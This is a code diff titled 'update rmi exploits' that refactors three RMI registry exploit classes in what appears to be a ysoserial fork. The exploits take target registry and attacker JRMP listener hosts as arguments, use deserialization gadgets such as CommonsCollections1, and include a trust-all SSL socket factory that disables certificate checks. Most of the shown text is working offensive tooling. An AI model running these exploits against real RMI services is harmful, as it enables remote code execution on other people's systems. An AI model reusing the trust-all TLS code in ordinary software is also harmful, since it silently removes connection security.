update rmi exploits

src/main/java/ysoserial/exploit/RMIRegistryExploit.java

@@ -1,5 +1,15 @@
 package ysoserial.exploit;
 
+import ysoserial.payloads.CommonsCollections1;
+import ysoserial.payloads.ObjectPayload;
+import ysoserial.payloads.ObjectPayload.Utils;
+import ysoserial.payloads.util.Gadgets;
+import ysoserial.secmgr.ExecCheckingSecurityManager;
+
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLSocketFactory;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
 import java.io.IOException;
 import java.net.Socket;
 import java.rmi.ConnectIOException;
@@ -9,13 +19,6 @@
 import java.rmi.server.RMIClientSocketFactory;
 import java.security.cert.X509Certificate;
 import java.util.concurrent.Callable;
-import javax.net.ssl.*;
-
-import ysoserial.payloads.CommonsCollections1;
-import ysoserial.payloads.ObjectPayload;
-import ysoserial.payloads.ObjectPayload.Utils;
-import ysoserial.payloads.util.Gadgets;
-import ysoserial.secmgr.ExecCheckingSecurityManager;
 
 /*
  * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader.
@@ -26,14 +29,14 @@
  */
 @SuppressWarnings({"rawtypes", "unchecked"})
 public class RMIRegistryExploit {
-	private static class TrustAllSSL implements X509TrustManager {
+    protected static class TrustAllSSL implements X509TrustManager {
 		private static final X509Certificate[] ANY_CA = {};
 		public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }
 		public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
 		public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
 	}
 
-	private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
+	protected static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
 		public Socket createSocket(String host, int port) throws IOException {
 			try {
 				SSLContext ctx = SSLContext.getInstance("TLS");

src/main/java/ysoserial/exploit/RMIRegistryExploit2.java

@@ -1,67 +1,30 @@
 package ysoserial.exploit;
 
-import sun.rmi.registry.RegistryImpl_Stub;
 import sun.rmi.server.UnicastRef;
-import sun.rmi.transport.DGCImpl_Stub;
 import sun.rmi.transport.LiveRef;
 import sun.rmi.transport.tcp.TCPEndpoint;
-import ysoserial.payloads.ObjectPayload;
-import ysoserial.payloads.util.Gadgets;
-import ysoserial.secmgr.ExecCheckingSecurityManager;
 
 import javax.management.remote.rmi.RMIConnectionImpl_Stub;
-import javax.management.remote.rmi.RMIServerImpl_Stub;
-import javax.net.ssl.*;
-import java.io.IOException;
-import java.io.Serializable;
-import java.lang.reflect.InvocationHandler;
-import java.lang.reflect.Method;
-import java.net.Socket;
 import java.rmi.ConnectIOException;
-import java.rmi.Remote;
 import java.rmi.registry.LocateRegistry;
 import java.rmi.registry.Registry;
 import java.rmi.server.ObjID;
-import java.rmi.server.RMIClientSocketFactory;
-import java.rmi.server.RemoteRef;
-import java.security.cert.X509Certificate;
 import java.util.Random;
-import java.util.concurrent.Callable;
+
+import static ysoserial.exploit.RMIRegistryExploit.RMISSLClientSocketFactory;
 
 /**
  * @author wh1t3P1g
  * @since 2020/1/9
  */
 public class RMIRegistryExploit2 {
 
-    private static class TrustAllSSL extends X509ExtendedTrustManager {
-        private static final X509Certificate[] ANY_CA = {};
-        public X509Certificate[] getAcceptedIssuers() {
-            return ANY_CA;
-        }
-        public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
-        public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
-        public void checkServerTrusted(final X509Certificate[] c, final String t, final SSLEngine e) { /* Do nothing/accept all */ }
-        public void checkServerTrusted(final X509Certificate[] c, final String t, final Socket e) { /* Do nothing/accept all */ }
-        public void checkClientTrusted(final X509Certificate[] c, final String t, final SSLEngine e) { /* Do nothing/accept all */ }
-        public void checkClientTrusted(final X509Certificate[] c, final String t, final Socket e) { /* Do nothing/accept all */ }
-    }
-
-    private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
-        public Socket createSocket(String host, int port) throws IOException {
-            try {
-                SSLContext ctx = SSLContext.getInstance("TLS");
-                ctx.init(null, new TrustManager[]{new TrustAllSSL()}, null);
-                SSLSocketFactory factory = ctx.getSocketFactory();
-                return factory.createSocket(host, port);
-            } catch (Exception e) {
-                throw new IOException(e);
-            }
-        }
-    }
-
     public static void main(final String[] args) throws Exception {
-        System.out.println("用法如下 RMIRegistryHost  RMIRegistryPort JRMPListenerHost JRMPListenerPort");
+        if ( args.length < 4 ) {
+            System.err.println(RMIRegistryExploit2.class.getName() + " <RMIRegistryHost>  <RMIRegistryPort> <JRMPListenerHost> <JRMPListenerPort>");
+            System.exit(-1);
+            return;
+        }
         final String rmiRegistryHost = args[0];
         final int rmiRegistryPort = Integer.parseInt(args[1]);
         final String jrmpHost = args[2];

src/main/java/ysoserial/exploit/RMIRegistryExploit3.java

@@ -4,71 +4,40 @@
 import sun.rmi.transport.LiveRef;
 import sun.rmi.transport.tcp.TCPEndpoint;
 
-import javax.management.remote.rmi.RMIConnectionImpl_Stub;
-import javax.net.ssl.*;
-import java.io.IOException;
-import java.io.Serializable;
-import java.lang.reflect.InvocationHandler;
-import java.lang.reflect.Method;
 import java.lang.reflect.Proxy;
-import java.net.Socket;
 import java.rmi.ConnectIOException;
 import java.rmi.Remote;
-import java.rmi.activation.Activator;
 import java.rmi.registry.LocateRegistry;
 import java.rmi.registry.Registry;
 import java.rmi.server.ObjID;
-import java.rmi.server.RMIClientSocketFactory;
 import java.rmi.server.RemoteObjectInvocationHandler;
 import java.rmi.server.RemoteRef;
-import java.security.cert.X509Certificate;
 import java.util.Random;
 
+import static ysoserial.exploit.RMIRegistryExploit.RMISSLClientSocketFactory;
 /**
  * @author wh1t3P1g
  * @since 2020/1/9
  */
 public class RMIRegistryExploit3 {
 
-    private static class TrustAllSSL extends X509ExtendedTrustManager {
-        private static final X509Certificate[] ANY_CA = {};
-        public X509Certificate[] getAcceptedIssuers() {
-            return ANY_CA;
-        }
-        public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
-        public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }
-        public void checkServerTrusted(final X509Certificate[] c, final String t, final SSLEngine e) { /* Do nothing/accept all */ }
-        public void checkServerTrusted(final X509Certificate[] c, final String t, final Socket e) { /* Do nothing/accept all */ }
-        public void checkClientTrusted(final X509Certificate[] c, final String t, final SSLEngine e) { /* Do nothing/accept all */ }
-        public void checkClientTrusted(final X509Certificate[] c, final String t, final Socket e) { /* Do nothing/accept all */ }
-    }
-
-    private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {
-        public Socket createSocket(String host, int port) throws IOException {
-            try {
-                SSLContext ctx = SSLContext.getInstance("TLS");
-                ctx.init(null, new TrustManager[]{new TrustAllSSL()}, null);
-                SSLSocketFactory factory = ctx.getSocketFactory();
-                return factory.createSocket(host, port);
-            } catch (Exception e) {
-                throw new IOException(e);
-            }
-        }
-    }
-
     public static void main(final String[] args) throws Exception {
-        System.out.println("用法如下 RMIRegistryHost  RMIRegistryPort JRMPListenerHost JRMPListenerPort");
-        final String rmiRegistryHost = args[0];
-        final int rmiRegistryPort = Integer.parseInt(args[1]);
+        if (args.length < 4) {
+            System.err.println(RMIRegistryExploit3.class.getName() + " <RMIRegistryHost>  <RMIRegistryPort> <JRMPListenerHost> <JRMPListenerPort>");
+            System.exit(-1);
+            return;
+        }
+        final String rHost = args[0];
+        final int rPort = Integer.parseInt(args[1]);
         final String jrmpListenerHost = args[2];
         final int jrmpListenerPort = Integer.parseInt(args[3]);
-        Registry registry = LocateRegistry.getRegistry(rmiRegistryHost, rmiRegistryPort);
+        Registry registry = LocateRegistry.getRegistry(rHost, rPort);
 
         // test RMI registry connection and upgrade to SSL connection on fail
         try {
             registry.list();
         } catch (ConnectIOException ex) {
-            registry = LocateRegistry.getRegistry(rmiRegistryHost, rmiRegistryPort, new RMISSLClientSocketFactory());
+            registry = LocateRegistry.getRegistry(rHost, rPort, new RMISSLClientSocketFactory());
         }
 
         // ensure payload doesn't detonate during construction or deserialization